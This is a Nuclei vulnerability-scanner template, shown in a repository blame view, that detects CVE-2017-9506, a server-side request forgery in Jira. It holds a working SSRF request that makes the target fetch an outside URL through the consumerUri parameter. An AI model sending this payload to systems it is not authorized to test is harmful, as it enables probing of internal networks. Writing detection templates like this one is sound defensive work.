nuclei-templates/cves/CVE-2017-9506.yaml

17 lines
327 B
YAML
Raw Normal View History

2020-05-08 18:40:02 +00:00
id: CVE-2017-9506
2020-04-04 18:19:48 +00:00
info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
matchers:
- type: word
words:
- "ipinfo.io/missingauth"
part: body